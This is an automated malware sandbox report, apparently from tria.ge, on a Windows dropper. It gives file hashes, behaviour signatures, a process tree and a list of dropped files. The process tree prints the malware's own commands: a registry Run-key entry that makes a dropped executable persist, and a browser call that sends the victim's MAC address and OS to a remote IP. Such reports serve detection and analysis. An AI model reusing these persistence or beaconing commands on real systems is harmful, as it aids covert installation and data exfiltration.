Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    178s
  • max time network
    71s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/12/2022, 13:51

General

  • Target

    ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe

  • Size

    365KB

  • MD5

    56d60722af183b394ddb2760e261909e

  • SHA1

    e87182c5b3a6b772a26d601aef6366182c560915

  • SHA256

    ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda

  • SHA512

    ed852a3cb6bb720882c4b34e5b2117e59c8c64c0e83ec0441cd90ce394061b90f8b35210d31abc72094c79a039bb97ff52f82cf9276e8ea5c766e91f9efb7862

  • SSDEEP

    6144:pTfFDbRnOTr085p8mkJeapssUZn7kyPTd4lnqukJja9zTK:v5Oc85prapshZn7/B5cG

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in Program Files directory 32 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe
    "C:\Users\Admin\AppData\Local\Temp\ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:420
    • C:\Program Files (x86)\winsoft9\t2.exe
      "C:\Program Files (x86)\winsoft9\t2.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4752
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "micrososot" /d "c:\program files (x86)\winsoft9\t2.exe " /f
        3⤵
        • Adds Run key to start application
        PID:2452
    • C:\Program Files (x86)\winsoft9\bho.exe
      "C:\Program Files (x86)\winsoft9\bho.exe"
      2⤵
      • Executes dropped EXE
      PID:4712
    • C:\Program Files (x86)\winsoft9\test.exe
      "C:\Program Files (x86)\winsoft9\test.exe"
      2⤵
      • Executes dropped EXE
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:4640
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=fe-97-78-29-be-37&os=Microsoft Windows XP&flag=9b1253cd8772f8c1d9bce90b8bc6c135&user=test
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4732
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4732 CREDAT:17410 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2416
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\1.vbs"
      2⤵
        PID:3068
    • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
      "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
      1⤵
        PID:1988
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3360
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3360 CREDAT:17410 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:5076

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files (x86)\winsoft9\1.vbs

        Filesize

        154B

        MD5

        efafb2e23c3a56c7c0a585c8f3a74c15

        SHA1

        24e2f29d57199a01d8e521b2468cfb2e4d338b3a

        SHA256

        45a4effd474083ae4bf4b8cef347f78c9d243aee6a7a9dd01b2fc9a069f26678

        SHA512

        9bc509ead39fef370be722e2e90730ce089857107d4d1d273502f85da26e213031e8f3a1e14f7d174274bf936121ea067c438850d36c510ef0ab37f7b8cba2ee

      • C:\Program Files (x86)\winsoft9\bho.exe

        Filesize

        65KB

        MD5

        4ba9a7d68cf22eef4354e6695b14109c

        SHA1

        20b6adf9febd22fa74662bf8dfd5a4f5803eda38

        SHA256

        9e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee

        SHA512

        907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac

      • C:\Program Files (x86)\winsoft9\bho.exe

        Filesize

        65KB

        MD5

        4ba9a7d68cf22eef4354e6695b14109c

        SHA1

        20b6adf9febd22fa74662bf8dfd5a4f5803eda38

        SHA256

        9e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee

        SHA512

        907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac

      • C:\Program Files (x86)\winsoft9\t2.exe

        Filesize

        12.9MB

        MD5

        c59ad09f4eb12b46a7ba0a38227da51e

        SHA1

        06b7396f728ff236b8ef13d2416fef312e592939

        SHA256

        9b46fb443da0aab5aa10aa0e630b2a8b30cd7476f559c0ead337af9f25095316

        SHA512

        f6e3ad3230bd1beae8e30d17f1e7338a1a13cfb1c5eb3c79acdcaf1c1a3d20e7401f691e23df7e188b0ff6a0f81279bb5812893eab2493501cb232dee20ef145

      • C:\Program Files (x86)\winsoft9\t2.exe

        Filesize

        12.9MB

        MD5

        c59ad09f4eb12b46a7ba0a38227da51e

        SHA1

        06b7396f728ff236b8ef13d2416fef312e592939

        SHA256

        9b46fb443da0aab5aa10aa0e630b2a8b30cd7476f559c0ead337af9f25095316

        SHA512

        f6e3ad3230bd1beae8e30d17f1e7338a1a13cfb1c5eb3c79acdcaf1c1a3d20e7401f691e23df7e188b0ff6a0f81279bb5812893eab2493501cb232dee20ef145

      • C:\Program Files (x86)\winsoft9\test.exe

        Filesize

        12.9MB

        MD5

        715c3c7d943e785d326bf4d8940bfd2a

        SHA1

        519ba001798b16ad089f409c738d869c91202d8c

        SHA256

        b1d0c0813470896ca9d85c7e7604d10ae63c528f4d85f70a77e82233d659bfd7

        SHA512

        0901f98b09ed9136062c59fd5feed75b514dffa94bc272d1564ca574822e03b0fb9b7bab975858838443dfe3d243d4af92596789d0a2f0f52b52014207fddf90

      • C:\Program Files (x86)\winsoft9\test.exe

        Filesize

        12.9MB

        MD5

        715c3c7d943e785d326bf4d8940bfd2a

        SHA1

        519ba001798b16ad089f409c738d869c91202d8c

        SHA256

        b1d0c0813470896ca9d85c7e7604d10ae63c528f4d85f70a77e82233d659bfd7

        SHA512

        0901f98b09ed9136062c59fd5feed75b514dffa94bc272d1564ca574822e03b0fb9b7bab975858838443dfe3d243d4af92596789d0a2f0f52b52014207fddf90

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CD19591C-7348-11ED-B696-FE977829BE37}.dat

        Filesize

        3KB

        MD5

        d2490eb16f633c6e117c3ed4e011ba38

        SHA1

        f61464f78aa797ac12281b97f3d8ce533233f60e

        SHA256

        ad8b26a343953ad8d5d03b4e66e887412b0cff394e88f655e21759035f25c43d

        SHA512

        4252a86c0790ff7db7ed90bfb06343b398b06195826c77e785004a7ef4b2c47f198568e3a88c12e1f841a90ccd1a3e23d2912047e945380cae709fd952106b25

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CE1611C6-7348-11ED-B696-FE977829BE37}.dat

        Filesize

        5KB

        MD5

        3ae7e547c0dec46fec57d69a9abc8265

        SHA1

        22d7a77e6ade3b3b0c871f6cb5c8096a0941eea3

        SHA256

        9b808567e382ce3f57f0efdceb82a6a988af7b8ed0319d44f09f5e42a264ae2a

        SHA512

        691887bbafe423787d8ea1f3ccb90ad6a09df0caae4ef73392c3a876658c1c53e0bd5b998692d24ecae38e34a6242b280107b1d41de424753bf40e8880a29f53

      • memory/4640-146-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/4752-139-0x0000000000400000-0x0000000000421000-memory.dmp

        Filesize

        132KB

      • memory/4752-149-0x0000000000400000-0x0000000000421000-memory.dmp

        Filesize

        132KB